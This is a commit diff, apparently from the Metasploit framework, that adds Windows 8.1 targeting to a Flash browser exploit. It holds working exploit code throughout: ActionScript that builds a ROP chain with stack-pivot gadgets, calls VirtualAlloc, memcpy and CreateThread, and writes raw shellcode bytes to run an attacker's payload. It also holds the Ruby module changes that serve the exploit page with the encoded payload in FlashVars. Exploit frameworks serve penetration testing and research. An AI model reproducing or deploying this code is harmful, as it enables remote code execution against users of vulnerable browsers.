Land support for Windows 8.1

bug/bundler_fix
jvazquez-r7 2015-06-03 22:46:47 -05:00
commit 098f31c1da
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
4 changed files with 93 additions and 15 deletions

Binary file not shown.

View File

@ -30,12 +30,14 @@ package
private var b64:Base64Decoder = new Base64Decoder() private var b64:Base64Decoder = new Base64Decoder()
private var payload:ByteArray private var payload:ByteArray
private var platform:String private var platform:String
private var os:String
private var original_length:uint = 0 private var original_length:uint = 0
public function Exploit() public function Exploit()
{ {
var i:uint = 0 var i:uint = 0
platform = LoaderInfo(this.root.loaderInfo).parameters.pl platform = LoaderInfo(this.root.loaderInfo).parameters.pl
os = LoaderInfo(this.root.loaderInfo).parameters.os
trigger_swf = LoaderInfo(this.root.loaderInfo).parameters.tr trigger_swf = LoaderInfo(this.root.loaderInfo).parameters.tr
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
var pattern:RegExp = / /g; var pattern:RegExp = / /g;
@ -118,8 +120,9 @@ package
return return
} }
exploiter = new Exploiter(this, platform, payload, uv) exploiter = new Exploiter(this, platform, os, payload, uv)
} }
} }
} }

View File

@ -11,6 +11,7 @@ package
private var eba:ExploitByteArray private var eba:ExploitByteArray
private var payload:ByteArray private var payload:ByteArray
private var platform:String private var platform:String
private var op_system:String
private var pos:uint private var pos:uint
private var byte_array_object:uint private var byte_array_object:uint
private var main:uint private var main:uint
@ -25,11 +26,12 @@ package
private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400) private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400)
private var spray:Vector.<Object> = new Vector.<Object>(89698) private var spray:Vector.<Object> = new Vector.<Object>(89698)
public function Exploiter(exp:Exploit, pl:String, p: ByteArray, uv:Vector.<uint>):void public function Exploiter(exp:Exploit, pl:String, os:String, p:ByteArray, uv:Vector.<uint>):void
{ {
exploit = exp exploit = exp
payload = p payload = p
platform = pl platform = pl
op_system = os
ev = new ExploitVector(uv) ev = new ExploitVector(uv)
if (!ev.is_ready()) return if (!ev.is_ready()) return
@ -133,12 +135,19 @@ package
private function do_rop():void private function do_rop():void
{ {
Logger.log("[*] Exploiter - do_rop()") Logger.log("[*] Exploiter - do_rop()")
if (platform == "linux") if (platform == "linux") {
do_rop_linux() do_rop_linux()
else if (platform == "win") } else if (platform == "win") {
do_rop_windows() if (op_system == "Windows 8.1") {
else do_rop_windows8()
} else if (op_system == "Windows 7") {
do_rop_windows()
} else {
return
}
} else {
return return
}
} }
private function do_rop_windows():void private function do_rop_windows():void
@ -150,7 +159,6 @@ package
var kernel32:uint = pe.module("kernel32.dll", winmm) var kernel32:uint = pe.module("kernel32.dll", winmm)
var ntdll:uint = pe.module("ntdll.dll", kernel32) var ntdll:uint = pe.module("ntdll.dll", kernel32)
var virtualprotect:uint = pe.procedure("VirtualProtect", kernel32) var virtualprotect:uint = pe.procedure("VirtualProtect", kernel32)
var winexec:uint = pe.procedure("WinExec", kernel32)
var virtualalloc:uint = pe.procedure("VirtualAlloc", kernel32) var virtualalloc:uint = pe.procedure("VirtualAlloc", kernel32)
var createthread:uint = pe.procedure("CreateThread", kernel32) var createthread:uint = pe.procedure("CreateThread", kernel32)
var memcpy:uint = pe.procedure("memcpy", ntdll) var memcpy:uint = pe.procedure("memcpy", ntdll)
@ -182,14 +190,14 @@ package
// VirtualAlloc // VirtualAlloc
eba.write(0, memcpy) eba.write(0, memcpy)
eba.write(0, 0x70000000) eba.write(0, 0x7f6e0000)
eba.write(0, 0x4000) eba.write(0, 0x4000)
eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
// memcpy // memcpy
eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
eba.write(0, 0x70000000) eba.write(0, 0x7f6e0000)
eba.write(0, payload_address + 8) eba.write(0, payload_address + 8)
eba.write(0, payload.length) eba.write(0, payload.length)
@ -198,7 +206,74 @@ package
eba.write(0, buffer + 0x10) // return to fix things eba.write(0, buffer + 0x10) // return to fix things
eba.write(0, 0) eba.write(0, 0)
eba.write(0, 0) eba.write(0, 0)
eba.write(0, 0x70000000) eba.write(0, 0x7f6e0000)
eba.write(0, 0)
eba.write(0, 0)
eba.write(0, 0)
eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
exploit.toString() // call method in the fake vtable
}
private function do_rop_windows8():void
{
Logger.log("[*] Exploiter - do_rop_windows8()")
var pe:PE = new PE(eba)
var flash:uint = pe.base(vtable)
var winmm:uint = pe.module("winmm.dll", flash)
var advapi32:uint = pe.module("advapi32.dll", flash)
var kernelbase:uint = pe.module("kernelbase.dll", advapi32)
var kernel32:uint = pe.module("kernel32.dll", winmm)
var ntdll:uint = pe.module("ntdll.dll", kernel32)
var virtualprotect:uint = pe.procedure("VirtualProtect", kernelbase)
var virtualalloc:uint = pe.procedure("VirtualAlloc", kernelbase)
var createthread:uint = pe.procedure("CreateThread", kernelbase)
var memcpy:uint = pe.procedure("memcpy", ntdll)
var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
// Continuation of execution
eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
eba.write(0, "\x89\x03", false) // mov [ebx], eax
eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
// Put the payload (command) in memory
eba.write(payload_address + 8, payload, true); // payload
// Put the fake vtabe / stack on memory
eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call dword ptr [eax+0A4h]
eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
eba.write(0, virtualprotect)
// VirtualProtect
eba.write(0, virtualalloc)
eba.write(0, buffer + 0x10)
eba.write(0, 0x1000)
eba.write(0, 0x40)
eba.write(0, buffer + 0x8) // Writable address (4 bytes)
// VirtualAlloc
eba.write(0, memcpy)
eba.write(0, 0x7ffd0000)
eba.write(0, 0x4000)
eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
// memcpy
eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
eba.write(0, 0x7ffd0000)
eba.write(0, payload_address + 8)
eba.write(0, payload.length)
// CreateThread
eba.write(0, createthread)
eba.write(0, buffer + 0x10) // return to fix things
eba.write(0, 0)
eba.write(0, 0)
eba.write(0, 0x7ffd0000)
eba.write(0, 0) eba.write(0, 0)
eba.write(0, 0) eba.write(0, 0)
eba.write(0, 0) eba.write(0, 0)
@ -242,8 +317,6 @@ package
eba.write(0, "\x5e", false) // pop esi eba.write(0, "\x5e", false) // pop esi
eba.write(0, "\xc3", false) // ret eba.write(0, "\xc3", false) // ret
// eba.write(buffer + 0x10, "\xcc\xcc\xcc\xcc", false)
// Put the popen parameters in memory // Put the popen parameters in memory
eba.write(payload_address + 0x8, payload, true) // false eba.write(payload_address + 0x8, payload, true) // false

View File

@ -51,7 +51,8 @@ class Metasploit3 < Msf::Exploit::Remote
:arch => ARCH_X86, :arch => ARCH_X86,
:os_name => lambda do |os| :os_name => lambda do |os|
os =~ OperatingSystems::Match::LINUX || os =~ OperatingSystems::Match::LINUX ||
os =~ OperatingSystems::Match::WINDOWS_7 os =~ OperatingSystems::Match::WINDOWS_7 ||
os =~ OperatingSystems::Match::WINDOWS_81
end, end,
:ua_name => lambda do |ua| :ua_name => lambda do |ua|
case target.name case target.name
@ -116,6 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info) target_payload = get_payload(cli, target_info)
b64_payload = Rex::Text.encode_base64(target_payload) b64_payload = Rex::Text.encode_base64(target_payload)
os_name = target_info[:os_name]
if target.name =~ /Windows/ if target.name =~ /Windows/
platform_id = 'win' platform_id = 'win'
@ -130,9 +132,9 @@ class Metasploit3 < Msf::Exploit::Remote
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" /> <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" /> <param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" /> <param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&tr=<%=trigger_hex_stream%>" /> <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>&tr=<%=trigger_hex_stream%>" />
<param name="Play" value="true" /> <param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&tr=<%=trigger_hex_stream%>" Play="true"/> <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>&tr=<%=trigger_hex_stream%>" Play="true"/>
</object> </object>
</body> </body>
</html> </html>